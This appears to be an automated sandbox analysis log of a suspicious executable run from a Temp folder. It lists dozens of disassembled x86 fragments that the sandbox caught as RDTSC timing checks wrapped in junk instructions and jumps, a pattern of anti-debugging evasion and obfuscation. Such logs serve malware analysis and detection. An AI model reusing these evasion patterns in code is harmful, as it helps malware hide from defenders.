Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 628660 second address: 6286D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 stc 0x00000015 sub bh, FFFFFF88h 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov ebx, dword ptr [ebp+122D28FBh] 0x00000025 mov eax, dword ptr [ebp+122D0115h] 0x0000002b mov edi, dword ptr [ebp+122D2F6Fh] 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FF698BF10C8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d movzx edi, dx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jc 00007FF698BF10DCh 0x00000059 jmp 00007FF698BF10D6h 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 633F7D second address: 633F87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 633F87 second address: 633FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FF698BF10C6h 0x00000013 jmp 00007FF698BF10CBh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 633FAF second address: 633FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62973D second address: 629752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62A860 second address: 62A869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 63D0DF second address: 63D0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 63D0F7 second address: 63D0FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 63D0FE second address: 63D123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop esi 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF698BF10D0h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 63D123 second address: 63D141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e jbe 00007FF698E1E1ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 63D2ED second address: 63D300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF698BF10CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 63D300 second address: 63D304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 642D42 second address: 642D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10D7h 0x00000009 jng 00007FF698BF10C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FF698BF10C6h 0x00000018 jmp 00007FF698BF10D0h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 642D7C second address: 642D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 642292 second address: 6422AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF698BF10DEh 0x00000008 jmp 00007FF698BF10D2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 642716 second address: 64274E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF698E1E1BFh 0x00000008 pushad 0x00000009 jmp 00007FF698E1E1B4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6428CA second address: 6428FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF698BF10C6h 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 jbe 00007FF698BF10C6h 0x00000016 jmp 00007FF698BF10D9h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 646088 second address: 64608C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 64B4D5 second address: 64B4D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CA7C second address: 61CA91 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007FF698E1E1B4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CA91 second address: 61CACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF698BF10C6h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FF698BF10C8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+124917D2h] 0x0000002c mov edx, dword ptr [ebp+122D296Bh] 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 pop eax 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CACF second address: 61CAE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CAE9 second address: 61CAED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CAED second address: 5FA3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1E97h], edi 0x00000010 call dword ptr [ebp+122D1FA5h] 0x00000016 push ebx 0x00000017 push esi 0x00000018 jmp 00007FF698E1E1ABh 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CCC3 second address: 61CCCD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CCCD second address: 61CCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CCD3 second address: 61CCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61CF57 second address: 61CF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF698E1E1B3h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D071 second address: 61D080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D1C3 second address: 61D1E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jne 00007FF698E1E1A6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D1E1 second address: 61D1FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF698BF10CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D1FD second address: 61D202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D202 second address: 61D225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF698BF10C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f je 00007FF698BF10CAh 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D2CB second address: 61D2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D2D0 second address: 61D2D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D321 second address: 61D326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61DAD0 second address: 61DAF9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FF698BF10D9h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61DF67 second address: 61DF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61DF6C second address: 5FAF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, si 0x0000000d call dword ptr [ebp+122D259Dh] 0x00000013 pushad 0x00000014 push ecx 0x00000015 jl 00007FF698BF10C6h 0x0000001b jp 00007FF698BF10C6h 0x00000021 pop ecx 0x00000022 push esi 0x00000023 jnl 00007FF698BF10C6h 0x00000029 pop esi 0x0000002a push esi 0x0000002b jmp 00007FF698BF10CDh 0x00000030 pop esi 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5C882A second address: 5C8830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 64A666 second address: 64A682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF698BF10D8h 0x0000000a jmp 00007FF698BF10D0h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5FA3D4 second address: 5FA3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF698E1E1A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FF698E1E1A6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5FA3E9 second address: 5FA3EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 64A952 second address: 64A95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF698E1E1A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 64A95C second address: 64A977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 64A977 second address: 64A996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1B9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 64AC08 second address: 64AC0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 64B062 second address: 64B06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF698E1E1A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 652879 second address: 652887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 652887 second address: 6528BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007FF698E1E1B2h 0x0000000d jnc 00007FF698E1E1A6h 0x00000013 pop ebx 0x00000014 jbe 00007FF698E1E1B7h 0x0000001a jmp 00007FF698E1E1B1h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6528BF second address: 6528CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10CBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 652A52 second address: 652A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 652FEF second address: 65300A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FF698BF10D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65300A second address: 653022 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF698E1E1A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF698E1E1A6h 0x00000010 jnp 00007FF698E1E1A6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 653022 second address: 653026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 653326 second address: 653334 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6534BA second address: 6534D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF698BF10CFh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6534D2 second address: 6534D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6534D8 second address: 6534E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jp 00007FF698BF10C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65391F second address: 653943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF698E1E1A6h 0x0000000a pushad 0x0000000b jmp 00007FF698E1E1B7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 653943 second address: 653949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 657FBD second address: 657FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF698E1E1B6h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 657FDA second address: 657FF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6583D3 second address: 6583D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 658546 second address: 65854C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 658C8F second address: 658C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 658C93 second address: 658CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF698BF10D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65D002 second address: 65D021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FF698E1E1B8h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65D2A0 second address: 65D2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65D2A4 second address: 65D2B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65D2B4 second address: 65D2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65D2B8 second address: 65D2BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65F8AD second address: 65F8CC instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698BF10C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF698BF10CFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 65F8CC second address: 65F8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66666F second address: 666679 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698BF10CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 664F0D second address: 664F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 664F11 second address: 664F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6651BD second address: 6651D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF698E1E1A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FF698E1E1A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 665353 second address: 665359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D91C second address: 61D927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF698E1E1A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61D927 second address: 61D996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF698BF10D8h 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FF698BF10C8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov cx, di 0x0000002e mov edi, 4C47BFBBh 0x00000033 push eax 0x00000034 pushad 0x00000035 push edi 0x00000036 jp 00007FF698BF10C6h 0x0000003c pop edi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF698BF10D1h 0x00000044 rdtsc
